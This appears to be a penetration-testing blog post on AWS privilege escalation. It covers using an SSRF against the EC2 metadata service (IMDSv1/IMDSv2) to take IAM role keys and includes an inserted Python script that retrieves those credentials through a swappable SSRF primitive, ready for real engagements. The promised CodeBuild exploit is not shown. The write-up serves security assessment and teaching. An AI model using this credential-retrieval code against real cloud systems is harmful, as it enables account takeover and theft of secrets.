In the last decade one of the most common patterns observed in web applications is their shift to cloud environments. This means that in 2023 you can't evaluate the security of a web application without going through a review of its cloud infrastructure, as you might miss the elephant in the room. That's why we at Shielder always try to learn new techniques to assess the security of cloud environments. This post is about a privilege escalation vector which we discovered during a recent assessment and which was not documented. If you have the codebuild:StartBuild and s3:PutObject privileges, along with a CodeBuild project which reads its configuration from an S3 bucket you have access to, then you can run arbitrary code in the context of the CodeBuild worker.

Just want to know how to escalate your privileges? Jump to the exploit!

Getting the AWS Keys

As with most cloud-related attacks, everything starts with a Server-Side Request Forgery (SSRF). This happens because most cloud providers implement a metadata endpoint which can be reached by all the cloud-based resources to query information about themselves, the project they are part of and, sometimes, their authentication keys. A curated list of cloud metadata endpoints for various providers can be found here.

Our specific scenario was a web application running on an AWS EC2 instance where we found a full-read SSRF. The first thing you want to understand when it comes to AWS and SSRF is the version of the Instance Metadata Service (IMDS) in use. This is a very important step because, based on its version, you need to meet different requirements to interact with it:

IMDSv1: no specific requirements are in place; by sending GET requests to the endpoints you can retrieve all the available information.
IMDSv2: you must be able to send a PUT request with an arbitrary header (X-aws-ec2-metadata-token-ttl-seconds) to /latest/api/token to negotiate a session token, and then attach that token in the X-aws-ec2-metadata-token header to all the GET requests to the various endpoints.

The difference is quite significant: for IMDSv1 a regular SSRF is enough, while for IMDSv2 you usually need a very powerful SSRF (control over the HTTP method and at least one request header) or you must find a Remote Code Execution (RCE).

Luckily for us our target was using version 1, therefore the following requests were enough to get the AWS keys for the role assigned to the EC2 instance:

Obtain the Key ID, Key Secret, and Session Token for the listed security credentials (a GET to /latest/meta-data/iam/security-credentials/ lists the role names attached to the instance profile, and a GET to that path followed by a role name returns a JSON document with the AccessKeyId, SecretAccessKey and Token fields).

Once the AWS keys have been obtained, the first thing you want to do is understand which privileges are bound to them. A quick sanity check is to export the three values as AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN and run aws sts get-caller-identity: it confirms the keys are valid and tells you which role you are acting as before you start enumerating permissions.
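The IMDSv1 versus IMDSv2 difference described above, as an added example that is not code from the original post. The network layer is abstracted as a send(method, url, headers) callback so the script runs offline: FakeIMDS is a constructed stand-in for 169.254.169.254 with a hypothetical role name and placeholder credentials. In a real engagement send would be your SSRF primitive; a full-read SSRF that only lets you pick a GET URL covers IMDSv1, while the IMDSv2 path needs a primitive that can issue a PUT and set a header.

```python
"""Added example: credential retrieval from IMDSv1 and IMDSv2 through an
abstract request primitive. FakeIMDS and its role/credential values are
constructed for this example and are not real."""
import json

IMDS = "http://169.254.169.254"
CREDS_PATH = "/latest/meta-data/iam/security-credentials/"
TOKEN_PATH = "/latest/api/token"
TTL_HEADER = "X-aws-ec2-metadata-token-ttl-seconds"
TOKEN_HEADER = "X-aws-ec2-metadata-token"


class FakeIMDS:
    """Constructed stand-in for the metadata service so the example runs offline."""

    def __init__(self, version):
        self.version = version
        self.tokens = set()
        # Hypothetical role name and placeholder credentials (not real values).
        self.role = "example-ec2-role"
        self.creds = {
            "Code": "Success",
            "Type": "AWS-HMAC",
            "AccessKeyId": "ASIAEXAMPLEKEYID",
            "SecretAccessKey": "examplesecretkey",
            "Token": "exampletoken",
            "Expiration": "2023-01-01T00:00:00Z",
        }

    def send(self, method, url, headers=None):
        headers = headers or {}
        path = url[len(IMDS):]
        # Token negotiation is accepted by both versions: PUT plus the TTL header.
        if method == "PUT" and path == TOKEN_PATH and TTL_HEADER in headers:
            token = f"tok-{len(self.tokens)}"
            self.tokens.add(token)
            return 200, token
        if method != "GET":
            return 405, ""
        # IMDSv2 rejects any GET that does not carry a previously negotiated token.
        if self.version == 2 and headers.get(TOKEN_HEADER) not in self.tokens:
            return 401, ""
        if path == CREDS_PATH:
            return 200, self.role
        if path == CREDS_PATH + self.role:
            return 200, json.dumps(self.creds)
        return 404, ""


def fetch_v1(send, path):
    """IMDSv1: a plain GET is enough."""
    return send("GET", IMDS + path, {})


def fetch_v2(send, path, ttl=21600):
    """IMDSv2: negotiate a session token with PUT, then attach it to the GET."""
    status, token = send("PUT", IMDS + TOKEN_PATH, {TTL_HEADER: str(ttl)})
    if status != 200:
        raise RuntimeError(f"token negotiation failed: HTTP {status}")
    return send("GET", IMDS + path, {TOKEN_HEADER: token})


def get_role_credentials(send, fetch):
    """List the role attached to the instance profile, then read its credentials."""
    status, body = fetch(send, CREDS_PATH)
    if status != 200:
        raise RuntimeError(f"cannot list roles: HTTP {status}")
    role = body.splitlines()[0]
    status, body = fetch(send, CREDS_PATH + role)
    if status != 200:
        raise RuntimeError(f"cannot read credentials for {role}: HTTP {status}")
    creds = json.loads(body)
    return {k: creds[k] for k in ("AccessKeyId", "SecretAccessKey", "Token")}


def aws_env(creds):
    """Environment variables the AWS CLI reads, e.g. before `aws sts get-caller-identity`."""
    return {
        "AWS_ACCESS_KEY_ID": creds["AccessKeyId"],
        "AWS_SECRET_ACCESS_KEY": creds["SecretAccessKey"],
        "AWS_SESSION_TOKEN": creds["Token"],
    }


if __name__ == "__main__":
    v1 = FakeIMDS(version=1)
    print(aws_env(get_role_credentials(v1.send, fetch_v1)))
    v2 = FakeIMDS(version=2)
    print("v1-style GET against IMDSv2 returns HTTP", fetch_v1(v2.send, CREDS_PATH)[0])
    print(aws_env(get_role_credentials(v2.send, fetch_v2)))
```

Replacing FakeIMDS.send with a function that drives the real SSRF is the only change needed on an engagement; if the primitive cannot send a PUT, fetch_v2 fails at token negotiation, which is exactly the IMDSv2 hurdle the text describes.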